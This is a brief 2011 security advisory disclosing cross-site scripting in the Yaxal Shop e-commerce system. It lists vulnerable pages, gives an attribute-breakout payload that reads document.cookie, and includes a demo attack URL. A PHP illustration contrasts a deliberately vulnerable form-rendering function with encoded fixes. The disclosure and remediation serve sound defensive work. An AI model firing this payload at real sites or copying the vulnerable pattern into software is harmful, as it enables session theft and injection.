Yaxal Shop suffers from multiple cross site scripting vulnerabilities.
# Exploit Title: Yaxal Shop (E-Commerce System) Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.polyspaston.com/content_shopdirector.php
# Version: All versions
# Tested on: All versions are vulnerable
ISSUE
Cross-site scripting is possible through user input appended to the URL of the vulnerable pages.
Vulnerable Pages:
yaxal_products.php
yaxal_user.php
Example:
yaxal_user.php/<XSS Code>
yaxal_products.php/<XSS Code>
Exploit:
"onmouseover=prompt(document.cookie)>
Demo:
http://demo.yaxal.com/yaxal_products.php/%22onmouseover=prompt%28905645%29%3E
Thanks,
Eyup CELIK
Information Technologies Security Specialist
http://www.eyupcelik.com.tr
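
The payload above closes a double-quoted HTML attribute and adds an event handler. The following is an added example, not part of the advisory and not Yaxal Shop code, showing that pattern next to two hardened forms. It assumes the pages echo the request path (`$_SERVER['PHP_SELF']`, which includes the trailing path-info) into an attribute; the function names and the form markup are hypothetical.

```php
<?php
// Added illustration; not Yaxal Shop source code.
// Assumption: the page echoes the request path (PHP_SELF, which includes
// any trailing /path-info) into a double-quoted HTML attribute.

// Vulnerable pattern: the raw path lands inside action="...".
function render_form_vulnerable(string $phpSelf): string
{
    return '<form method="post" action="' . $phpSelf . '">';
}

// Hardened pattern 1: encode for the HTML attribute context.
function render_form_encoded(string $phpSelf): string
{
    $safe = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $safe . '">';
}

// Hardened pattern 2: do not reflect path-info at all; SCRIPT_NAME
// holds only the script path, without the request-controlled suffix.
function render_form_script_name(string $scriptName): string
{
    $safe = htmlspecialchars($scriptName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $safe . '">';
}

// Constructed request values modelled on the demo URL in the advisory
// (already URL-decoded, as PHP presents them in $_SERVER).
$phpSelf    = '/yaxal_products.php/"onmouseover=prompt(905645)>';
$scriptName = '/yaxal_products.php';

$out = [
    'vulnerable'  => render_form_vulnerable($phpSelf),
    'encoded'     => render_form_encoded($phpSelf),
    'script_name' => render_form_script_name($scriptName),
];

foreach ($out as $label => $html) {
    // The injection succeeds only if an unescaped quote closed the
    // attribute, leaving onmouseover= as a live attribute of the tag.
    $brokeOut = strpos($html, '"onmouseover=') !== false;
    printf("%-12s %s\n             breakout=%s\n", $label, $html, $brokeOut ? 'yes' : 'no');
}
```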